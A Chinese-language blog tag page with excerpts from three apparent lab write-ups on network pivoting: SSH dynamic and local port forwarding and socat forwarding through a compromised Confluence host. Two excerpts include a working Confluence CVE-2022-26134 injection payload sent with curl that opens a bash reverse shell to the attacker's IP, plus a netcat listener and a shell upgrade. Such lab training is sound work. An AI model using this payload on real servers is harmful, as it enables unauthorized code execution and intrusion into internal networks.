發表文章

目前顯示的是有「Port」標籤的文章

SSH Tunneling - Dynamic Port Forwarding

圖片
  SSH Tunneling - Dynamic Port Forwarding 上一篇本機連接埠轉送有一個明顯的限制:每個 SSH 連線只能連接到一個套接字 這使得大規模使用變得非常乏味。幸運的是,OpenSSH 還提供動態連接埠轉送 從 SSH 用戶端上的單一偵聽端口,封包可以轉送到 SSH 伺服器主機有權存取的任何套接字 SSH 動態連接埠轉送之所以有效,是因為 SSH 用戶端所建立的偵聽連接埠是 SOCKS 代理伺服器連接埠 SOCKS 是一種代理協定,與郵政服務非常相似。 SOCKS 伺服器接受資料包(帶有 SOCKS 協定標頭)並將它們轉發到它們所尋址的任何地方。 在 SSH 動態連接埠轉送中,封包可以傳送到 SSH 用戶端電腦上的單一偵聽 SOCKS 連接埠。 這些將透過 SSH 連接推送,然後轉發到 SSH 伺服器電腦可以路由的任何地方。 唯一的限制是資料包必須正確格式化 - 通常由 SOCK 相容的客戶端軟體格式化。 在某些情況下,軟體預設不相容於 SOCKS。 如下網路圖中說明 SSH 動態連接埠轉送 攻擊機 : 192.168.45.183 靶機環境 : 192.168.216.63、10.4.216.215、172.16.216.217 起手第一步先 CONFLUENCE 漏洞進入 192.168.216.63 curl -v http://192.168.216.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.45.183/4444%200%3E%261%27%29.start%28%29%22%29%7D/ nc 4444 Port 就進來了,接著下 python3 -c 'import pty; pty.spawn("/bin/bash")' 確保 TTY Shell 接著使用指令 ssh -N -D 0.0.0.0:9...

SSH Tunneling - Local Port Forwarding

圖片
 SSH Tunneling -  Local Port Forwarding 讓我們回想一下上一篇 Socat 場景中的第一個連接埠轉送範例。我們將 Socat 設定為偵聽 CONFLUENCE01 WAN 介面上的 TCP 連接埠 2345。在該連接埠上收到的封包被轉送到 PGDATABASE01 上的 TCP 連接埠 5432。我們使用它從 Kali 機器透過 CONFLUENCE01 連接到 PGDATABASE01 上的 PostgreSQL 服務。在這種情況下需要注意的關鍵一點是偵聽和轉送都是從同一台主機 (CONFLUENCE01) 完成的。 SSH 本地埠轉送對此新增了一個小改動。使用 SSH 本機連接埠轉發,封包不會由偵聽封包的相同主機轉送。相反,在兩個主機(SSH 用戶端和 SSH 伺服器)之間建立 SSH 連接, SSH 用戶端打開一個偵聽端口,並且在此端口上接收到的所有數據包都通過 SSH 連接通過隧道傳輸到SSH 伺服器。然後封包由 SSH 伺服器轉送到我們指定的套接字。 稍微修改一下先前的場景:Socat 現在在 CONFLUENCE01 上不再可用。我們仍然擁有之前從 Confluence 資料庫破解的所有憑證,並且仍然沒有防火牆阻止我們連接到 CONFLUENCE01 上綁定的連接埠。 使用database_admin憑證,我們將登入PGDATABASE01並發現它連接到另一個內部子網路。我們在該子網路中找到一台開啟了伺服器訊息區塊(SMB) 伺服器(在 TCP 連接埠 445 上)的主機。我們希望能夠連接到該伺服器並將我們找到的內容下載到我們的 Kali 機器上。 在這種類型的場景中,我們將計劃建立一個 SSH 本地連接埠轉發,作為從 CONFLUENCE01 到 PGDATABASE01 的 SSH 連接的一部分。我們將在CONFLUENCE01的WAN介面上綁定一個監聽埠。發送到該連接埠的所有封包都將透過 SSH 隧道轉送。然後,PGDATABASE01 會將這些封包轉送到我們找到的新主機上的 SMB 連接埠。 攻擊機 192.168.45.187 靶機 192.168.198.63、10.4.198.215、172.16.198.217 使用一樣的 Confluence 漏洞拿 Reverse Shell c...

Socat 連接埠轉發

圖片
 Socat 連接埠轉發 環境說明 攻擊機 Kali IP : 192.168.45.200 DMZ 對外開放之 Web Server IP & Port : 192.168.229.63, 8090 靶機內網 DB IP : 10.4.229.215 第一步一樣先 rustscan 外網機器,僅開了 22, 8090, 8091 Port rustscan -a 192.168.229.63 --scripts none --ulimit 5000 nmap 列舉這三個 Port 服務,sudo nmap -sC -sV -p 22,8090,8091 192.168.229.63 22 是 SSH,8090 是 HTTP Service 8091 也是 HTTP Service whatweb 8090 發現是 Confluence 依據此網站介紹的 Confluence Web CVE 弱點 https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/ 我們將利用以下這一段指令來建立 Reverse Shell POC 指令 :  curl -v http://192.168.229.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.45.200/4444%200%3E%261%27%29.start%28%29%22%29%7D/ nc 4444 進來了,whoami 確認是 confluence 服務帳號 ip ro or ip addr 查看網路確認有另外一隻腳 10.4.229.63 (ens224) 由於這是一個有限的服務帳號所以可以看到的東西不多,但一樣要進行枚舉 尤其服務帳號一定要看網站設定檔與 Log 結果在 ...